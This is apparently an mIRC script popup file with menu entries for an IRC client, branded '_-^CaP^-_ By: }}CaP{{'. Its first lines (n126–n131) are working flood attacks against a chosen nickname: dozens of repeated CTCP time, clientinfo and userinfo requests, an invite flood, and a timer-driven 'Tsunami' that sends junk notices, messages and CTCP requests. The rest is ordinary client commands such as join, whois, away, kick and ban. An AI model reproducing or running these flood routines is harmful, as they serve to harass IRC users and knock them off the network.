n126=..Time:/ctcp $$1 time | /ctcp $$1 time | /ctcp $$1 time | /ctcp $$1 time | /ctcp $$1 time | /ctcp $$1 time | /ctcp $$1 time | /ctcp $$1 time | /ctcp $$1 time | /ctcp $$1 time | /ctcp $$1 time | /ctcp $$1 time | /ctcp $$1 time | /ctcp $$1 time | /ctcp $$1 time | /ctcp $$1 time | /ctcp $$1 time | /ctcp $$1 time | /ctcp $$1 time | /ctcp $$1 time | /ctcp $$1 time | /ctcp $$1 time | /ctcp $$1 time | /ctcp $$1 time | /ctcp $$1 time | /ctcp $$1 time | /ctcp $$1 time | /ctcp $$1 time | /ctcp $$1 time | /ctcp $$1 time | /ctcp $$1 time | /ctcp $$1 time | /ctcp $$1 time | /ctcp $$1 time | /ctcp $$1 time
n127=..Clientinfo:/ctcp $$1 clientinfo | /ctcp $$1 clientinfo | /ctcp $$1 clientinfo | /ctcp $$1 clientinfo | /ctcp $$1 clientinfo | /ctcp $$1 clientinfo | /ctcp $$1 clientinfo | /ctcp $$1 clientinfo | /ctcp $$1 clientinfo | /ctcp $$1 clientinfo | /ctcp $$1 clientinfo | /ctcp $$1 clientinfo | /ctcp $$1 clientinfo | /ctcp $$1 clientinfo | /ctcp $$1 clientinfo | /ctcp $$1 clientinfo | /ctcp $$1 clientinfo | /ctcp $$1 clientinfo | /ctcp $$1 clientinfo | /ctcp $$1 clientinfo | /ctcp $$1 clientinfo | /ctcp $$1 clientinfo | /ctcp $$1 clientinfo | /ctcp $$1 clientinfo | /ctcp $$1 clientinfo | /ctcp $$1 clientinfo | /ctcp $$1 clientinfo
n128=..Userinfo:/ctcp $$1 userinfo | /ctcp $$1 userinfo | /ctcp $$1 userinfo | /ctcp $$1 userinfo | /ctcp $$1 userinfo | /ctcp $$1 userinfo | /ctcp $$1 userinfo | /ctcp $$1 userinfo | /ctcp $$1 userinfo | /ctcp $$1 userinfo | /ctcp $$1 userinfo | /ctcp $$1 userinfo | /ctcp $$1 userinfo | /ctcp $$1 userinfo | /ctcp $$1 userinfo | /ctcp $$1 userinfo | /ctcp $$1 userinfo | /ctcp $$1 userinfo | /ctcp $$1 userinfo | /ctcp $$1 userinfo | /ctcp $$1 userinfo | /ctcp $$1 userinfo | /ctcp $$1 userinfo | /ctcp $$1 userinfo | /ctcp $$1 userinfo | /ctcp $$1 userinfo | /ctcp $$1 userinfo | /ctcp $$1 userinfo | /ctcp $$1 userinfo
n129=.Normal floodz
n130=..Invite flood:/invite $$1  | /invite $$1  | /invite $$1  | /invite $$1  | /invite $$1  | /invite $$1  | /invite $$  | /invite $$1  | /invite $$1  | /invite $$1  | /invite $$1 
n131=..Tsunami:/timer1 $$?="How many times:" 1 /notice $$1 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ | /timer2 $$! 1 /msg $$1 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ | /timer3 $$! 1 /ctcp $$1 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

[bPopup]
n0=_-^CaP^-_ By: }}CaP{{
n1=Commands
n2=.Join channel:/join #$$?="Enter channel name:"
n3=.Part channel:/part #$$?="Enter channel name:"
n4=.Query user:/query $$?="Enter nickname and message:"
n5=.Send notice:/notice $$?="Enter nickname and message:"
n6=.Whois user:/whois $$?="Enter nickname:"
n7=.Whowas user:/whowas $$?="Enter nickname:"
n8=Send CTCP
n9=.Ping
n10=..NiCk:/ctcp $$?="Enter nickname:" ping
n11=..Channel:/ctcp # ping
n12=.Time
n13=..NiCk:/ctcp $$?="Enter nickname:" time
n14=..Channel:/ctcp # time
n15=.Version
n16=..NiCk:/ctcp $$?="Enter nickname:" version
n17=..Channel:/ctcp # version
n18=.Finger
n19=..NiCk:/ctcp $$?="Enter nickname:" finger
n20=..Channel:/ctcp # finger
n21=.Clientinfo
n22=..NiCk:/ctcp $$?="Enter nickname:" clientinfo
n23=..Channel:/ctcp # clientinfo
n24=.Userinfo
n25=..NiCk:/ctcp $$?="Enter nickname:" userinfo
n26=..Channel:/ctcp # userinfo
n27=Set Away
n28=.On:/ame is GoNe... _-^CaP^-_ By: }}CaP{{!!! | /away $$?="Enter away message:" | /timer1 0 120 /ame is BRB:  $+ $$! $+ 
n29=.Off:/ame iZ BaCk!!! | /away | /timer1 off
n30=Channel commands
n31=.Invite user:/invite $$?="Enter nickname and channel:"
n32=.Ban user:/ban $$?="Enter channel and nickname:" 3
n33=.Kick user:/kick $$?="Enter channel and nickname:" _-^CaP^-_ By: }}CaP{{
n34=.Ignore user
n35=..Add:/ignore $$?="Enter nickname:" 3
n36=..Remove:/ignore -r $$?="Enter nickname:" 3
n37=.Change nickname:/nick $$?="Enter new nickname:"
n38=.Coo nickname:/nick CaP-RoX $+ $r(10,99)
n39=-
n40=Quit IRC:/quit _-^CaP^-_ By: }}CaP{{ Email webmaster@usamoney.com for it! | /exit
